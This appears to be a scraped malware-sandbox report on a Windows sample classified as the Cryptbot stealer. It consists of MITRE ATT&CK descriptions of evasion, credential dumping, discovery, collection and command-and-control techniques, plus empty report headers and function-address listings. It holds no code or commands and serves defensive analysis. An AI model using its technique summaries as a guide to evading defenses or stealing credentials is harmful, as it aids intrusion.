Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Cryptbot

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

UDP Packets

ICMP Packets

Function 00415BF0, Relevance: 128.2, APIs: 34, Strings: 39, Instructions: 412
COMMON

Function 0040AD20, Relevance: 51.1, APIs: 25, Strings: 4, Instructions: 331
COMMON

Function 00414000, Relevance: 35.8, APIs: 10, Strings: 10, Instructions: 799
COMMON

Function 00401220, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 280
fileencryptionCOMMON

Function 0040A6E3, Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 269
registryCOMMON

Function 0040AA30, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 158
registryCOMMON

Function 00429D74, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 376
timeCOMMONLIBRARYCODE

Function 00401540, Relevance: 70.6, APIs: 13, Strings: 27, Instructions: 637
fileCOMMON

Function 0040AD8F, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 339
windowmemoryCOMMON

Function 00402E20, Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 229
registryCOMMON

Function 0040AA92, Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 207
registrysleepCOMMON

Function 00413670, Relevance: 18.2, APIs: 12, Instructions: 208
fileCOMMON

Function 0042FAC3, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Function 00428D30, Relevance: 13.8, APIs: 9, Instructions: 301
COMMONLIBRARYCODE

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre